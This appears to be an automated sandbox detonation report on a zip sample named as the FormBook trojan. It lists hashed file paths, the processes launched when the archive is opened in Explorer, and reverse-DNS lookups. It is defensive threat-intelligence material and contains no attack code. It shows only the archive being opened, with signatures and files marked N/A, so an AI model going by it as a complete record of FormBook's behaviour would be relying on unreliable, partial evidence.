SHA512 eed140ddebee749544f5adb13b6a2aa4dcbc7ae033896981ef6149ca9521c50c0360aac1b7bf62623bd20c95c81b5417dfc1cdf0877b41dce1726376181c55b3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000046

MD5 4a7b1f40fd27abcdc4a318f2efd7c113
SHA1 e2464ffb6c467db7d06ad2f322e410d87c90ebbd
SHA256 ed9cf0a0845cc48d115000aec947caae61e156f9967ec16d8c4e214dcb43f6f9
SHA512 3d7b5b182f02169f1721649fef4cfab571a141d28c6699971cbb8ca893c39de2cfbf2b0454a601ee0d91befea251ad77fb3c5f27dfacc9e96e7209aa3cfc021c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00008c

MD5 e24b7e69f6b235df0248e077a0364456
SHA1 1a3fd1eaf8c24ada660e100a465edc9e97fe1620
SHA256 a44926484ef97a51d5e1e8464b8acecd204dfd7955fe328278bc152d712082de
SHA512 d5d11f4650a3e41afa32435afe4f278628edfcefac2d6888e1ca02b1a24614e03a8d00be0baee0b967729a25e516043037d553a224dc1886881392c8458ac004

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000044

MD5 88959e7b464dd8ea5869e851a4fed2c8
SHA1 6ca1dcf4c64ac55b3771229378f512dbb92dc68d
SHA256 1ff4b77be88287d9bee2eea69e836cae142324e377d49208959df95b827a0117
SHA512 b3f3b5f79ca711fe65bd62df7debedf523551a275bd6173f95f24b5a66857f844a909d2a2eba63a9fb4dea7852ae1638d27c2288f71dc24c132fd0b59ec2034d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 6c5c2bf5390a70e0c1ef0fc94743e5e4
SHA1 b6dea7365d9ce66fd6bb9d9969d576111e524d6f
SHA256 d8a2d9c8b9eb6cff5ff81e32c511cd324ac51609697e198629a157a606cdc8a6
SHA512 4149e2373ee319d7a31164184101165ae40b1a72cfdd59264f4b9b291e183d0dbe5dc920aef27d84576e3fe466e927cb078bb9e09e13b3d56504d3aa21ae04cb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000047

MD5 bdb05b4139a6d98d15e2621d9d9ecf0a
SHA1 dd7b244d913c700548a3a1a770054c730a96ed92
SHA256 841675203e3e8cb5fb2b440008187d63b6dc33ccc5900061e3089023db84184d
SHA512 06be35c01d1d59563711f678f233982a0be150d028a10259a643384bd41f114f01b0c830e6f7a54ef0c155d3000ff936d2e438e752abd774a6edf80ab9aa5408

C:\Users\Admin\AppData\Local\Temp\7zSDC42.tmp\__data__\config.txt

MD5 a105a47c98f80b8852960c96b87de57f
SHA1 564e75ca9dcf70541b6f89622f1728387b96571f
SHA256 6091181db52b0b2379c6d23966f50a0fc2109d2536f613f1235465774106e9f2
SHA512 50a62a5d9cf35833bd9162021cb29644cd455d725cd7b54b1cb1e364aa8b367aa233eba42fc976242ec538103344c8986c816e7e269aefe3873298ccc843e664

C:\Users\Admin\AppData\Local\Temp\_MEI45922\setuptools-49.2.1.dist-info\INSTALLER

MD5 365c9bfeb7d89244f2ce01c1de44cb85
SHA1 d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512 d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000048

MD5 fee6c6f3f2bdc4efbb6762c1cd4d6d18
SHA1 e6d35b4182a999ec8ccd3f766f1d97213ca35fe9
SHA256 91f81ac16ef2da0e02f40d46fd26a05dcbfa46e86a90eb8a366de34732cdfbac
SHA512 05c13641f04a43d53f5ebba9a9d1f71ed082a940b3fe4643dea65ccb09cb90c28757fb060f3dcec62681c79163cab66aef8a48407eb7b0501db3e47679cdce74

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 e0180a83c57af119a3555718da6363e0
SHA1 faf4ff799085bc3aea197ae6acd0dee0ddb041de
SHA256 4e8d8971a23d27fa4d04c84d1f3e2459145d37a7fe44ad74e9d206ee1018b0c3
SHA512 496c547fc2e978a0bb9e3d3458014e9c26f6a601556a3228cf45d68f77fa82c208cb220f021e564eb4e7dd43bdd00129f0d244652c82d256371ed151f9e029f2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 47b1b1cf32aaa84db8d688320c90d7ee
SHA1 4acc6b025963206530107b5d4d0e47b7c5dda553
SHA256 866e7a89127e5701a2a286016dfdd805677978318ed3d00deabd3e82acf61755
SHA512 0643a81096cc32d4c47f624c42206dbaf61476152b0a0b9335521f6c9ef6b872a19cba0f5f34af155cb5e694c12fb8c2312ac93caac42733dcad9edb11177d6f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 4dc18c1e67e61a116623af57e8dac6cb
SHA1 1838710367cde99cff45130798747a43bb1e210e
SHA256 8f603a0cec5de71a8ae50b7d00c7755f06a42230cc969779e73c625c0bdec3a4
SHA512 08d8af148ea51b30931508471193af7295d21b74798b3daca3504073403a94c40f3330a4bb584bfa734be8fef01695b8f652812f7876a80d189354666b6fbb51

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_drive.google.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 08e953bcd331de253e561427221e3da1
SHA1 0c914173e6c658161a2dc929c4cae4f82d0a2737
SHA256 0eeb78f8d49f24f353a9ffcbb45bc1bf0ec4bac8a17bd7478693f4d54bf8814c
SHA512 14132adbc97896c9531f956cadae4e5c539d330b8cc79c15161973e356b4c25c71b63bf1bedad8642cab1aa97f78c0794e867ec7caa3555f17b22f145076c711

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000049

MD5 f1ce48b5dac44bd4d9ba3b898bcc349e
SHA1 7528ba70e50fa208d64d6a8c69ed52d729f4b3d0
SHA256 22807c10aedc2cc4b945bfb6e98ab55455418c731443abff3267b308bf1d34c4
SHA512 a53dc0c66be573726bc0c2738d875e1e79cb7cfcca3ac90b3db8f650fad5c025e364faa8505b8cd7098c5841bc6bbf0a36662822ace2ebad27ddabe4d5f4912b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 75482fa960b338eaa30961ec1dfca38d
SHA1 f3eb2a426004f4a2d651c23b045e6539e9810a4f
SHA256 b2c155b81007a3f483522087332fa7a24589737e092f80a6ea427e609fe659ba
SHA512 525d445dbfa9ff1314fc4767b350cd6e102736b63564dc6c84c8ff079993bde892e081da7e98415615a1d4513f3f0dd26520023153789650f38cc62fd52b1f29

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 17:26

Reported

2024-06-01 17:44

Platform

win10v2004-20240508-en

Max time kernel

999s

Max time network

1003s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

N/A